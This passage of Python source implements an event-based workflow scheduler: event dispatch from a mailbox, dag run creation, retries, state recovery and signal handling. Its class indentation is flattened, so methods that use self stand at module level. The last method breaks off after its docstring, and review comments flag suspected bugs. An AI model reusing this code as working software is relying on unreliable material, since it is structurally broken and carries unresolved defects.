    def __init__(self, id,
                 mailbox: Mailbox,
                 task_event_manager: DagRunEventManager,
                 executor: BaseExecutor,
                 notification_client: NotificationClient,
                 notification_server_uri: str,
                 context=None,
                 periodic_manager: PeriodicManager = None):
        """Wire the scheduler to its mailbox, executor and clients.

        :param id: scheduling job id this scheduler instance belongs to
        :param mailbox: queue of inbound scheduler events
        :param task_event_manager: per-dagrun event handler dispatcher
        :param executor: executor receiving task scheduling actions
        :param notification_client: client used to answer RequestEvents
        :param notification_server_uri: URI of the notification server
        :param context: forwarded to LoggingMixin
        :param periodic_manager: manager for periodically triggered tasks
        """
        super().__init__(context)
        self.id = id
        self.mailbox = mailbox
        self.task_event_manager: DagRunEventManager = task_event_manager
        self.executor = executor
        self.notification_client = notification_client
        # DAGs are read from the serialized-dag table, not the dag folder.
        self.dagbag = DagBag(read_dags_from_db=True)
        self._timer_handler = None
        self.timers = sched.scheduler()
        self.periodic_manager = periodic_manager
        self.notification_server_uri = notification_server_uri
def sync(self):
    """Run the executor-sync timer loop.

    Schedules ``self.executor.sync`` at the configured heartbeat interval
    and then blocks in ``self.timers.run()`` until the pending timer is
    cancelled via :meth:`stop_timer`.  Intended to run on its own thread
    (see :meth:`submit_sync_thread`).
    """
    def call_regular_interval(
        delay: float,
        action: Callable,
        arguments=(),
        kwargs=None,
    ):
        # Fix: the previous version used a mutable default ``kwargs={}``,
        # which is shared across calls and can leak state between timers.
        if kwargs is None:
            kwargs = {}

        def repeat(*args, **kwargs):
            action(*args, **kwargs)
            # This is not perfect. If we want a timer every 60s, but action
            # takes 10s to run, this will run it every 70s.
            # Good enough for now
            self._timer_handler = self.timers.enter(delay, 1, repeat, args, kwargs)

        # Initial scheduling; repeat() re-arms itself after each run.
        self._timer_handler = self.timers.enter(delay, 1, repeat, arguments, kwargs)

    call_regular_interval(
        delay=conf.getfloat('scheduler', 'scheduler_heartbeat_sec', fallback='5.0'),
        action=self.executor.sync
    )
    # Blocks until the queue is empty (i.e. the timer was cancelled).
    self.timers.run()
def stop_timer(self):
    """Cancel the pending executor-sync timer event, if one is armed."""
    if not (self.timers and self._timer_handler):
        return
    self.timers.cancel(self._timer_handler)
def submit_sync_thread(self):
    """Run :meth:`sync` on a freshly started background thread."""
    sync_thread = threading.Thread(target=self.sync)
    sync_thread.start()
def schedule(self) -> bool:
    """Consume one message from the mailbox and dispatch it by type.

    :return: False when a StopSchedulerEvent addressed to this scheduler
        (or broadcast with job_id 0) was handled — the caller's loop
        should exit; True otherwise (including when the mailbox is empty).
    """
    identified_message = self.mailbox.get_identified_message()
    if not identified_message:
        return True
    origin_event = identified_message.deserialize()
    self.log.debug("Event: {}".format(origin_event))
    # Unwrap scheduler-internal events; external events pass through as-is.
    if SchedulerInnerEventUtil.is_inner_event(origin_event):
        event = SchedulerInnerEventUtil.to_inner_event(origin_event)
    else:
        event = origin_event
    with create_session() as session:
        if isinstance(event, BaseEvent):
            # External notification event: fan out to every dag run whose
            # declared event dependencies are affected by it.
            dagruns = self._find_dagruns_by_event(event, session)
            for dagrun in dagruns:
                dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
                self.task_event_manager.handle_event(dag_run_id, event)
        elif isinstance(event, RequestEvent):
            # User-originated request (run dag / stop run / execute task).
            self._process_request_event(event)
        elif isinstance(event, TaskSchedulingEvent):
            # Forward a concrete task action straight to the executor.
            self._schedule_task(event)
        elif isinstance(event, TaskStateChangedEvent):
            dagrun = self._find_dagrun(event.dag_id, event.execution_date, session)
            if dagrun is not None:
                self._handle_task_status_changed(dagrun, event, session)
                dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
                self.task_event_manager.handle_event(dag_run_id, origin_event)
                # Start tasks directly downstream of the changed task.
                tasks = self._find_downstream_tasks(event.task_id, dagrun, session)
                self._send_scheduling_task_events(tasks, SchedulingAction.START)
                if dagrun.state in State.finished:
                    self.mailbox.send_message(DagRunFinishedEvent(dagrun.dag_id, dagrun.execution_date).to_event())
            else:
                self.log.warning("dagrun is None for dag_id:{} execution_date: {}".format(event.dag_id,
                                                                                          event.execution_date))
        elif isinstance(event, DagRunCreatedEvent):
            dagrun = self._find_dagrun(event.dag_id, event.execution_date, session)
            if dagrun is not None:
                tasks = self._find_scheduled_tasks(dagrun, session)
                self._send_scheduling_task_events(tasks, SchedulingAction.START)
            else:
                self.log.warning("dagrun is None for dag_id:{} execution_date: {}".format(
                    event.dag_id, event.execution_date))
        elif isinstance(event, DagExecutableEvent):
            # Create a new scheduled run only if the dag is due for one.
            if DagModel.dag_needing_dagruns(session, event.dag_id):
                dagrun = self._create_dag_run(event.dag_id, session=session)
                tasks = self._find_scheduled_tasks(dagrun, session)
                self._send_scheduling_task_events(tasks, SchedulingAction.START)
        elif isinstance(event, EventHandleEvent):
            dag_runs = DagRun.find(dag_id=event.dag_id, run_id=event.dag_run_id)
            if len(dag_runs) < 1:
                self.log.warning("DagRun not found by dag_id:{}, run_id:{}".format(
                    event.dag_id, event.dag_run_id))
            else:
                ti = dag_runs[0].get_task_instance(event.task_id)
                self._send_scheduling_task_event(ti, event.action)
        elif isinstance(event, StopDagEvent):
            self._stop_dag(event.dag_id, session)
        elif isinstance(event, DagRunFinishedEvent):
            self._remove_periodic_events(event.dag_id, event.execution_date)
        elif isinstance(event, PeriodicEvent):
            dag_runs = DagRun.find(dag_id=event.dag_id, execution_date=event.execution_date)
            if len(dag_runs) < 1:
                self.log.warning("DagRun not found by dag_id:{}, execution_date:{}".format(
                    event.dag_id, event.execution_date))
            else:
                ti = dag_runs[0].get_task_instance(event.task_id)
                # Periodic tasks are re-run, not started fresh.
                self._send_scheduling_task_event(ti, SchedulingAction.RESTART)
        elif isinstance(event, StopSchedulerEvent):
            self.log.info("{} {}".format(self.id, event.job_id))
            # job_id 0 is a broadcast stop for every scheduler.
            if self.id == event.job_id or 0 == event.job_id:
                self.log.info("break the scheduler event loop.")
                identified_message.remove_handled_message()
                session.expunge_all()
                return False
        elif isinstance(event, ParseDagRequestEvent) or isinstance(event, ParseDagResponseEvent):
            pass
        elif isinstance(event, ResponseEvent):
            pass
        else:
            self.log.error("can not handler the event {}".format(event))
        # Ack the message so it is not replayed after a restart.
        identified_message.remove_handled_message()
        session.expunge_all()
        return True
def _handle_task_status_changed(self, dagrun: DagRun, event: TaskStateChangedEvent, session):
    """React to a task-instance state change reported from a worker.

    Only events whose try_number matches the instance's current
    try_number are honoured (stale events from earlier tries are
    ignored).  UP_FOR_RETRY tasks are re-queued at the computed next
    retry time via a delayed TaskSchedulingEvent.
    """
    ti = dagrun.get_task_instance(task_id=event.task_id)
    if event.try_number == ti.try_number:
        if State.UP_FOR_RETRY == event.state:
            dag = self.dagbag.get_dag(dagrun.dag_id, session=session)
            # next_retry_datetime() needs the task definition attached.
            ti.task = dag.get_task(ti.task_id)
            next_retry_datetime = ti.next_retry_datetime()
            # queue_time delays the retry until the backoff has elapsed.
            self.mailbox.send_message(message=TaskSchedulingEvent(dag_id=event.dag_id,
                                                                  task_id=event.task_id,
                                                                  execution_date=event.execution_date,
                                                                  try_number=event.try_number,
                                                                  action=SchedulingAction.START).to_event(),
                                      queue_time=next_retry_datetime)
        ti.update_latest_task_execution(session=session)
def stop(self) -> None:
    """Ask the event loop to exit by mailing a StopSchedulerEvent."""
    stop_event = StopSchedulerEvent(self.id).to_event()
    self.mailbox.send_message(stop_event)
    self.log.info("Send stop event to the scheduler.")
def recover(self, last_scheduling_id):
    """Restore state left behind by the previous scheduler job.

    Recovers dag code missing from the DAG folder, restores executor
    state, then re-queues every message the previous job had accepted
    but not finished processing.

    :param last_scheduling_id: id of the previous scheduler job
    """
    lost_dag_codes = DagCode.recover_lost_dag_code()
    self.log.info("Found %s dags not exists in DAG folder, recovered from DB. Dags' path: %s",
                  len(lost_dag_codes), lost_dag_codes)
    self.log.info("Waiting for executor recovery...")
    self.executor.recover_state()
    unprocessed_messages = self.get_unprocessed_message(last_scheduling_id)
    self.log.info("Recovering %s messages of last scheduler job with id: %s",
                  len(unprocessed_messages), last_scheduling_id)
    for msg in unprocessed_messages:
        # Preserve the original queue_time so delayed retries stay delayed.
        self.mailbox.send_message(msg.deserialize(), msg.queue_time)
@staticmethod
def get_unprocessed_message(last_scheduling_id: int) -> List[IdentifiedMessage]:
    """Return QUEUED messages of the given scheduler job, oldest first."""
    with create_session() as session:
        queued_rows: List[MSG] = session.query(MSG).filter(
            MSG.scheduling_job_id == last_scheduling_id,
            MSG.state == MessageState.QUEUED
        ).order_by(asc(MSG.id)).all()
        return [
            IdentifiedMessage(row.data, row.id, row.queue_time)
            for row in queued_rows
        ]
def _find_dagrun(self, dag_id, execution_date, session) -> DagRun:
    """Return the DagRun matching (dag_id, execution_date), or None."""
    query = session.query(DagRun).filter(
        DagRun.dag_id == dag_id,
        DagRun.execution_date == execution_date
    )
    return query.first()
def _register_periodic_events(self, execution_date, dag, session=None):
    """Register every periodically-triggered task of a dag run.

    Tasks opt in by carrying a 'periodic_config' entry in their
    executor_config.
    """
    self.periodic_manager.store.set_session(session)
    for task in dag.tasks:
        if task.executor_config is not None and 'periodic_config' in task.executor_config:
            self.log.debug('register periodic task {} {} {}'.format(dag.dag_id, execution_date, task.task_id))
            self.periodic_manager.add_task(dag_id=dag.dag_id,
                                           execution_date=execution_date,
                                           task_id=task.task_id,
                                           periodic_config=task.executor_config['periodic_config'])
    # Detach the session again so the store does not hold a stale one.
    self.periodic_manager.store.unset_session()
@provide_session
def _remove_periodic_events(self, dag_id, execution_date, session=None):
    """Unregister the periodic tasks of a finished dag run.

    Mirrors :meth:`_register_periodic_events`: every task that carries a
    'periodic_config' in its executor_config is removed.
    """
    dagruns = DagRun.find(dag_id=dag_id, execution_date=execution_date)
    if not dagruns:
        self.log.warning(f'Gets no dagruns to remove periodic events with dag_id: {dag_id} '
                         f'and execution_date: {execution_date}.')
    else:
        dag = self.dagbag.get_dag(dag_id=dagruns[0].dag_id, session=session)
        for task in dag.tasks:
            if task.executor_config is not None and 'periodic_config' in task.executor_config:
                self.log.debug('remove periodic task {} {} {}'.format(dag_id, execution_date, task.task_id))
                self.periodic_manager.remove_task(dag_id, execution_date, task.task_id)
def _create_dag_run(self, dag_id, session, run_type=DagRunType.SCHEDULED, context=None) -> DagRun:
    """Create a RUNNING DagRun for `dag_id` and register its periodic tasks.

    :param run_type: SCHEDULED runs use the model's next_dagrun date and
        advance it afterwards; MANUAL runs use utcnow() and are marked
        externally triggered.
    :return: the new (or pre-existing) DagRun, or None when the dag/model
        is missing, scheduling is disabled, or creation failed.
    """
    with prohibit_commit(session) as guard:
        if settings.USE_JOB_SCHEDULE:
            """
            Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
            if/when the next DAGRun should be created
            """
            try:
                dag = self.dagbag.get_dag(dag_id, session=session)
                dag_model = session \
                    .query(DagModel).filter(DagModel.dag_id == dag_id).first()
                if dag_model is None:
                    return None
                next_dagrun = dag_model.next_dagrun
                dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
                external_trigger = False
                # register periodic task
                if run_type == DagRunType.MANUAL:
                    next_dagrun = timezone.utcnow()
                    external_trigger = True
                # Explicitly check if the DagRun already exists. This is an edge case
                # where a Dag Run is created but `DagModel.next_dagrun` and `DagModel.next_dagrun_create_after`
                # are not updated.
                active_dagrun = session.query(DagRun)\
                    .filter(DagRun.dag_id == dag_model.dag_id,
                            DagRun.execution_date == dag_model.next_dagrun).first()
                if active_dagrun is not None:
                    self.log.info("Dagrun already created, %s", active_dagrun)
                    return active_dagrun
                dag_run = dag.create_dagrun(
                    run_type=run_type,
                    execution_date=next_dagrun,
                    start_date=timezone.utcnow(),
                    state=State.RUNNING,
                    external_trigger=external_trigger,
                    session=session,
                    dag_hash=dag_hash,
                    creating_job_id=self.id,
                    context=context
                )
                # Only scheduled runs advance the dag's next_dagrun pointer.
                if run_type == DagRunType.SCHEDULED:
                    self._update_dag_next_dagrun(dag_id, session)
                self._register_periodic_events(dag_run.execution_date, dag, session)
                # commit the session - Release the write lock on DagModel table.
                guard.commit()
                # END: create dagrun
                return dag_run
            except SerializedDagNotFound:
                self.log.exception("DAG '%s' not found in serialized_dag table", dag_id)
                return None
            except Exception:
                self.log.exception("Error occurred when create dag_run of dag: %s", dag_id)
                return None
def _update_dag_next_dagrun(self, dag_id, session):
    """
    Bulk update the next_dagrun and next_dagrun_create_after for all the dags.

    We batch the select queries to get info about all the dags at once.
    When the dag is at (or above) max_active_runs, creation of further
    runs is suspended by nulling next_dagrun_create_after.
    """
    # Count only scheduler-created (non externally triggered) active runs.
    active_runs_of_dag = session \
        .query(func.count('*')).filter(
            DagRun.dag_id == dag_id,
            DagRun.state == State.RUNNING,
            DagRun.external_trigger.is_(False),
        ).scalar()
    dag_model = session \
        .query(DagModel).filter(DagModel.dag_id == dag_id).first()
    dag = self.dagbag.get_dag(dag_id, session=session)
    if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
        self.log.info(
            "DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
            dag.dag_id,
            active_runs_of_dag,
            dag.max_active_runs,
        )
        dag_model.next_dagrun_create_after = None
    else:
        dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
            dag_model.next_dagrun
        )
def _schedule_task(self, scheduling_event: TaskSchedulingEvent):
    """Forward a task scheduling action to the executor."""
    instance_key = TaskInstanceKey(
        scheduling_event.dag_id,
        scheduling_event.task_id,
        scheduling_event.execution_date,
        scheduling_event.try_number,
    )
    self.executor.schedule_task(instance_key, scheduling_event.action)
def _find_dagruns_by_event(self, event, session) -> Optional[List[DagRun]]:
    """Return the RUNNING dag runs affected by an external event.

    A dag run is affected when its dag's declared event dependencies
    match the event key AND the dag's context extractor accepts the
    event (broadcast, or the run's context is among the extracted ones).
    """
    affect_dag_runs = []
    event_key = EventKey(event.key, event.event_type, event.namespace, event.sender)
    dag_runs = session \
        .query(DagRun).filter(DagRun.state == State.RUNNING).all()
    self.log.debug('dag_runs {}'.format(len(dag_runs)))
    if dag_runs is None or len(dag_runs) == 0:
        return affect_dag_runs
    dags = session.query(SerializedDagModel).filter(
        SerializedDagModel.dag_id.in_(dag_run.dag_id for dag_run in dag_runs)
    ).all()
    self.log.debug('dags {}'.format(len(dags)))
    # dag_id -> EventContext for every dag whose dependencies match.
    affect_dags = {}
    for dag in dags:
        self.log.debug('dag config {}'.format(dag.event_relationships))
        self.log.debug('event key {} {} {}'.format(event.key, event.event_type, event.namespace))
        dep: DagEventDependencies = DagEventDependencies.from_json(dag.event_relationships)
        if dep.is_affect(event_key):
            context_extractor: ContextExtractor = dag.context_extractor
            try:
                event_context: EventContext = context_extractor.extract_context(event)
            except Exception as e:
                # A failing user-defined extractor skips the dag instead of
                # killing the scheduler loop.
                self.log.error(
                    "Failed to call context extractor, dag {} skips event {}".format(dag.dag_id, event),
                    exc_info=e)
                continue
            if event_context is not None:
                affect_dags[dag.dag_id] = event_context
    if len(affect_dags) == 0:
        return affect_dag_runs
    for dag_run in dag_runs:
        if dag_run.dag_id in affect_dags:
            event_context: EventContext = affect_dags[dag_run.dag_id]
            if event_context.is_broadcast() or dag_run.context in event_context.get_contexts():
                affect_dag_runs.append(dag_run)
    return affect_dag_runs
def _find_scheduled_tasks(
    self,
    dag_run: DagRun,
    session: Session,
    check_execution_date=False
) -> Optional[List[TI]]:
    """
    Make scheduling decisions about an individual dag run

    ``currently_active_runs`` is passed in so that a batch query can be
    used to ask this for all dag runs in the batch, to avoid an n+1 query.

    :param dag_run: The DagRun to schedule
    :param check_execution_date: reject runs with a future execution date
        (unless the dag allows them)
    :return: scheduled tasks
    """
    if not dag_run or dag_run.get_state() in State.finished:
        return
    try:
        dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
    except SerializedDagNotFound:
        self.log.exception("DAG '%s' not found in serialized_dag table", dag_run.dag_id)
        return None
    if not dag:
        self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
        return None
    # Execution dates of this dag's runs with unfinished task instances.
    currently_active_runs = session.query(
        TI.execution_date,
    ).filter(
        TI.dag_id == dag_run.dag_id,
        TI.state.notin_(list(State.finished)),
    ).distinct().all()
    if check_execution_date and dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
        self.log.warning("Execution date is in future: %s", dag_run.execution_date)
        return None
    if dag.max_active_runs and not dag.is_long_running_dag():
        if (
            len(currently_active_runs) >= dag.max_active_runs
            and dag_run.execution_date not in currently_active_runs
        ):
            # NOTE(review): this branch only warns and still proceeds to
            # schedule; upstream Airflow returns None here — confirm the
            # fall-through is intentional.
            self.log.warning(
                "DAG %s already has %d active runs, not queuing any tasks for run %s",
                dag.dag_id,
                len(currently_active_runs),
                dag_run.execution_date,
            )
    self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
    schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
    dag_run.schedule_tis(schedulable_tis, session)
    session.commit()
    # Re-read SCHEDULED instances of this run (dag must not be paused).
    query = (session.query(TI)
             .outerjoin(TI.dag_run)
             .filter(DR.run_id == dag_run.run_id)
             .join(TI.dag_model)
             .filter(not_(DM.is_paused))
             .filter(TI.state == State.SCHEDULED)
             .options(selectinload('dag_model')))
    # Row locks prevent a concurrent scheduler from double-dispatching.
    scheduled_tis: List[TI] = with_row_locks(
        query,
        of=TI,
        **skip_locked(session=session),
    ).all()
    return scheduled_tis
def _find_downstream_tasks(self, task_id, dag_run, session) -> Optional[List[TI]]:
    """Of the run's schedulable tasks, keep direct downstreams of `task_id`."""
    schedulable = self._find_scheduled_tasks(dag_run, session)
    if not schedulable:
        return None
    dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
    downstream_ids = dag.task_dict.get(task_id).downstream_task_ids
    return [ti for ti in schedulable if ti.task_id in downstream_ids]
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
    """Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
    latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
    if dag_run.dag_hash == latest_version:
        self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
        return
    # Record the version we are reconciling against.
    dag_run.dag_hash = latest_version
    # Refresh the DAG
    dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
    # Verify integrity also takes care of session.flush
    dag_run.verify_integrity(session=session)
def _send_scheduling_task_event(self, ti: Optional[TI], action: SchedulingAction):
    """Mark `ti` QUEUED and mail a TaskSchedulingEvent carrying `action`.

    No-op when `ti` is None or the action is NONE.
    """
    if ti is None or action == SchedulingAction.NONE:
        return
    with create_session() as session:
        # NOTE(review): `ti` is not merged into this fresh session, so the
        # QUEUED state is only persisted if `ti` is already attached to a
        # live session — confirm.
        ti.state = State.QUEUED
        session.commit()
    # NOTE(review): arguments here are positional with task_id first,
    # while other call sites construct TaskSchedulingEvent with explicit
    # dag_id=/task_id= keywords — verify the parameter order matches.
    task_scheduling_event = TaskSchedulingEvent(
        ti.task_id,
        ti.dag_id,
        ti.execution_date,
        ti.try_number,
        action
    )
    self.mailbox.send_message(task_scheduling_event.to_event())
def _send_scheduling_task_events(self, tis: Optional[List[TI]], action: SchedulingAction):
    """Fan one scheduling action out over a collection of task instances."""
    for ti in (tis or []):
        self._send_scheduling_task_event(ti, action)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
    """Publish open/queued/running slot gauges for every pool."""
    pools = models.Pool.slots_stats(session=session)
    for pool_name, slot_stats in pools.items():
        Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
        Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
        Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@staticmethod
def _reset_unfinished_task_state(dag_run):
    """Reset unfinished (non-RUNNING, non-QUEUED) task instances to NONE."""
    with create_session() as session:
        resettable_states = [
            s for s in State.unfinished if s not in (State.RUNNING, State.QUEUED)
        ]
        for ti in dag_run.get_task_instances(resettable_states, session):
            ti.state = State.NONE
        session.commit()
@provide_session
def restore_unfinished_dag_run(self, session):
    """Re-dispatch the schedulable tasks of every unfinished dag run."""
    dag_runs = DagRun.next_dagruns_to_examine(session, max_number=sys.maxsize).all()
    if not dag_runs:
        return
    for dag_run in dag_runs:
        self._reset_unfinished_task_state(dag_run)
        runnable = self._find_scheduled_tasks(dag_run, session)
        self._send_scheduling_task_events(runnable, SchedulingAction.START)
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
    """Count one scheduler heartbeat tick in statsd."""
    Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def _process_request_event(self, event: RequestEvent, session: Session = None):
    """Handle a user request (run dag / stop run / execute task).

    Each request is answered with a ResponseEvent carrying the affected
    run_id (or None on failure) keyed by the request_id.
    """
    try:
        message = BaseUserDefineMessage()
        message.from_json(event.body)
        if message.message_type == UserDefineMessageType.RUN_DAG:
            # todo make sure dag file is parsed.
            dagrun = self._create_dag_run(message.dag_id, session=session, run_type=DagRunType.MANUAL,
                                          context=message.context)
            if not dagrun:
                self.log.error("Failed to create dag_run.")
                # TODO Need to add ret_code and error_msg in ExecutionContext in case of exception
                self.notification_client.send_event(ResponseEvent(event.request_id, None).to_event())
                return
            tasks = self._find_scheduled_tasks(dagrun, session, False)
            self._send_scheduling_task_events(tasks, SchedulingAction.START)
            self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
        elif message.message_type == UserDefineMessageType.STOP_DAG_RUN:
            dag_run = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
            self._stop_dag_run(dag_run)
            self.notification_client.send_event(ResponseEvent(event.request_id, dag_run.run_id).to_event())
        elif message.message_type == UserDefineMessageType.EXECUTE_TASK:
            dagrun = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
            ti: TI = dagrun.get_task_instance(task_id=message.task_id)
            self.mailbox.send_message(TaskSchedulingEvent(
                task_id=ti.task_id,
                dag_id=ti.dag_id,
                execution_date=ti.execution_date,
                try_number=ti.try_number,
                action=SchedulingAction(message.action)
            ).to_event())
            self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
    except Exception:
        # A bad request must not kill the scheduler loop.
        self.log.exception("Error occurred when processing request event.")
def _stop_dag(self, dag_id, session: Session):
    """
    Stop the dag. Pause the dag and cancel all running dag_runs and task_instances.
    """
    dag_model = DagModel.get_dagmodel(dag_id, session)
    dag_model.set_is_paused(is_paused=True, including_subdags=True, session=session)
    for dag_run in DagRun.find(dag_id=dag_id, state=State.RUNNING):
        self._stop_dag_run(dag_run)
def _stop_dag_run(self, dag_run: DagRun):
    """Stop a run: halt its unfinished tasks, then announce it finished."""
    dag_run.stop_dag_run()
    unfinished = [ti for ti in dag_run.get_task_instances()
                  if ti.state in State.unfinished]
    for ti in unfinished:
        self.executor.schedule_task(ti.key, SchedulingAction.STOP)
    finished_event = DagRunFinishedEvent(
        dag_id=dag_run.dag_id,
        execution_date=dag_run.execution_date).to_event()
    self.mailbox.send_message(finished_event)
class SchedulerEventWatcher(EventWatcher):
    """Bridges notification-service events into the scheduler mailbox."""

    def __init__(self, mailbox):
        self.mailbox = mailbox

    def process(self, events: List[BaseEvent]):
        """Forward every received event to the mailbox, unchanged."""
        for event in events:
            self.mailbox.send_message(event)
class EventBasedSchedulerJob(BaseJob):
    """BaseJob that wires up and runs an EventBasedScheduler.

    1. todo self heartbeat
    """
    __mapper_args__ = {'polymorphic_identity': 'EventBasedSchedulerJob'}

    def __init__(self, dag_directory,
                 notification_server_uri=None,
                 event_start_time=None,
                 max_runs=-1,
                 refresh_dag_dir_interval=conf.getint('scheduler', 'refresh_dag_dir_interval', fallback=1),
                 *args, **kwargs):
        """Assemble the scheduler: mailbox, dag trigger, managers, clients.

        :param dag_directory: folder watched for dag files
        :param notification_server_uri: falls back to scheduler config
        :param event_start_time: listen from this event time; when None it
            is derived from the previous job's progress (triggering state
            recovery) or from "now" for a fresh start
        :param max_runs: forwarded to the DagTrigger
        :param refresh_dag_dir_interval: dag-dir rescan interval (seconds)
        """
        super().__init__(*args, **kwargs)
        if notification_server_uri is None:
            notification_server_uri = conf.get('scheduler', 'notification_server_uri', fallback='127.0.0.1:50052')
        self.log.info("Starting event based scheduler with notification server uri: {}".format(notification_server_uri))
        self.mailbox: Mailbox = Mailbox()
        self.dag_trigger: DagTrigger = DagTrigger(
            dag_directory=dag_directory,
            max_runs=max_runs,
            dag_ids=None,
            pickle_dags=False,
            mailbox=self.mailbox,
            refresh_dag_dir_interval=refresh_dag_dir_interval,
            notification_server_uri=notification_server_uri
        )
        self.task_event_manager = DagRunEventManager(self.mailbox)
        self.executor.set_mailbox(self.mailbox)
        self.executor.set_notification_server_uri(notification_server_uri)
        self.notification_client: NotificationClient = NotificationClient(server_uri=notification_server_uri,
                                                                          default_namespace=SCHEDULER_NAMESPACE)
        self.periodic_manager = PeriodicManager(self.mailbox)
        self.scheduler: EventBasedScheduler = EventBasedScheduler(
            self.id,
            self.mailbox,
            self.task_event_manager,
            self.executor,
            self.notification_client,
            notification_server_uri,
            None,
            self.periodic_manager
        )
        self.last_scheduling_id = self._last_scheduler_job_id()
        self.need_recover_state = False
        self.last_event_version = None
        if event_start_time is None:
            if self.last_scheduling_id is None:
                # Fresh deployment: listen from "now" (epoch millis).
                self.start_time = int(time.time() * 1000)
            else:
                # need recover the state of the scheduler
                self.start_time, self.last_event_version = self._get_progress(self.last_scheduling_id)
                self.need_recover_state = True
        else:
            self.start_time = event_start_time
        self.log.info('Progress {} {}'.format(self.start_time, self.last_event_version))
@staticmethod
def _last_scheduler_job_id():
    """Return the id of the most recent scheduler job, or None."""
    last_run = EventBasedSchedulerJob.most_recent_job()
    return last_run.id if last_run else None
@staticmethod
def _get_progress(scheduling_job_id):
    """Return (last_event_time, last_event_version) of a prior job.

    Falls back to (now in epoch millis, None) when no progress exists.
    """
    progress = get_event_progress(scheduling_job_id)
    if progress is not None:
        return progress.last_event_time, progress.last_event_version
    return int(time.time() * 1000), None
def _execute(self):
    """Run the whole scheduler lifecycle: start subsystems, loop, tear down.

    Start order matters: the mailbox and background managers come up
    before event listening and the executor, so no event is dropped.
    """
    # faulthandler.enable()
    self.log.info("Starting the scheduler Job")
    # DAGs can be pickled for easier remote execution by some executors
    # pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
    try:
        self.mailbox.set_scheduling_job_id(self.id)
        self.mailbox.start()
        self.scheduler.id = self.id
        self.dag_trigger.start()
        self.task_event_manager.start()
        self.executor.job_id = self.id
        self.periodic_manager.start()
        self.register_signals()
        # Start after resetting orphaned tasks to avoid stressing out DB.
        execute_start_time = timezone.utcnow()
        self.scheduler.submit_sync_thread()
        if self.need_recover_state:
            self.scheduler.recover(self.last_scheduling_id)
        self._set_event_progress()
        self._start_listen_events()
        self.executor.start()
        # Blocks until a StopSchedulerEvent is handled.
        self._run_scheduler_loop()
        # Tear down in reverse of the start order.
        self._stop_listen_events()
        self.periodic_manager.shutdown()
        self.dag_trigger.end()
        self.task_event_manager.end()
        self.executor.end()
        self.mailbox.stop()
        settings.Session.remove()  # type: ignore
    except Exception as e:  # pylint: disable=broad-except
        self.log.exception("Exception when executing scheduler, %s", e)
    finally:
        self.log.info("Exited execute loop")
def _run_scheduler_loop(self) -> None:
    """Main loop: pump scheduler.schedule() until it asks to stop.

    Any exception is logged and the loop continues after a short back-off,
    so a single bad event cannot kill the scheduler.
    """
    self.log.info("Starting the scheduler loop.")
    self.scheduler.restore_unfinished_dag_run()
    should_continue = True
    while should_continue:
        try:
            # schedule() returns False once a matching stop event arrives.
            should_continue = self.scheduler.schedule()
            self.heartbeat(only_if_necessary=True)
        except Exception as e:
            traceback.print_exc()
            self.log.error('Scheduler error [%s]', traceback.format_exc())
            # Back off briefly so a persistent failure cannot spin-loop.
            time.sleep(1)
    self.scheduler.stop_timer()
def _set_event_progress(self):
    """Persist this job's event-listening progress marker."""
    create_or_update_progress(
        scheduling_job_id=self.id,
        last_event_time=self.start_time,
        last_event_version=self.last_event_version,
    )
def _start_listen_events(self):
    """Begin streaming notification-server events into the mailbox."""
    self.notification_client.start_listen_events(
        watcher=SchedulerEventWatcher(self.mailbox),
        start_time=self.start_time,
        version=self.last_event_version
    )
def _stop_listen_events(self):
    """Stop streaming events from the notification server."""
    self.notification_client.stop_listen_events()
def register_signals(self) -> None:
    """Register signals that stop child processes"""
    signal.signal(signal.SIGINT, self._exit_gracefully)
    signal.signal(signal.SIGTERM, self._exit_gracefully)
    # SIGUSR2 dumps executor debug state without stopping the job.
    signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None:  # pylint: disable=unused-argument
    """Helper method to clean up processor_agent to avoid leaving orphan processes."""
    self.log.info("Exiting gracefully upon receiving signal %s", signum)
    sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame):  # pylint: disable=unused-argument
    """Signal handler: log a framed executor debug dump (see SIGUSR2)."""
    try:
        sig_name = signal.Signals(signum).name  # pylint: disable=no-member
    except Exception:  # pylint: disable=broad-except
        # Fall back to the raw number for non-standard signals.
        sig_name = str(signum)
    self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
    self.executor.debug_dump()
    self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
    """
    Is this SchedulerJob alive?

    We define alive as in a state of running and a heartbeat within the
    threshold defined in the ``scheduler_health_check_threshold`` config
    setting.

    ``grace_multiplier`` is accepted for compatibility with the parent class.

    :rtype: boolean
    """
